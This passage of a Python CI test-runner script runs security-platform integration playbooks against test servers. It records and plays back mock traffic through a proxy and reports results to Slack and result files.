self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now(datetime.timezone.utc)}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(xsoar_client):
"""
Turn off telemetry on the AMI instance
:param xsoar_client: Preconfigured client for the XSOAR instance
:return: None
"""
body, status_code, _ = demisto_client.generic_request_func(self=xsoar_client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, username=demisto_user, password=demisto_pass, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, chanel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=chanel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, username=demisto_user, password=demisto_pass, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests, skipped_tests, secret_params,
failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message,
test_options, slack, circle_ci, build_number, server, build_name, prints_manager,
is_ami, thread_index=thread_index)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
env_results_path = './env_results.json'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
if not os.path.isfile(env_results_path):
print_warning(f'Did not find {env_results_path} file, assuming server version is {default_version}.')
return default_version
with open(env_results_path, 'r') as json_file:
env_results = json.load(json_file)
instances_ami_names = set([env.get('AmiName') for env in env_results if ami_env in env.get('Role', '')])
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
demisto_user = secret_conf['username']
demisto_pass = secret_conf['userPassword']
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
xsoar_client = demisto_client.configure(base_url=server, username=demisto_user,
password=demisto_pass, verify_ssl=False)
# turn off telemetry
turn_off_telemetry(xsoar_client)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(xsoar_client, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(proxy=proxy.ami.docker_ip + ':' + proxy.PROXY_PORT,
username=demisto_user, password=demisto_pass,
server=server)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_user, demisto_pass,
demisto_api_key, prints_manager, thread_index=thread_index)
proxy.configure_proxy_in_demisto(username=demisto_user, password=demisto_pass, server=server)
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
if exc.__class__ == ApiException:
error_message = exc.body
else:
error_message = f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}'
prints_manager.add_print_job(error_message, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks if the string representation of the current test configuration is already in
the executed_in_current_round set.
If it is- it means we have already executed this test and the we have reached a round and there are tests that
were not able to be locked by this execution..
In that case we want to start a new round monitoring by emptying the 'executed_in_current_round' set and sleep
in order to let the tests be unlocked
Args:
executed_in_current_round: A set containing the string representation of all tests configuration as they appear
in conf.json file that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
A new executed_in_current_round set which contains only the current tests configuration if a round was completed
else it just adds the new test to the set.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be ran
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
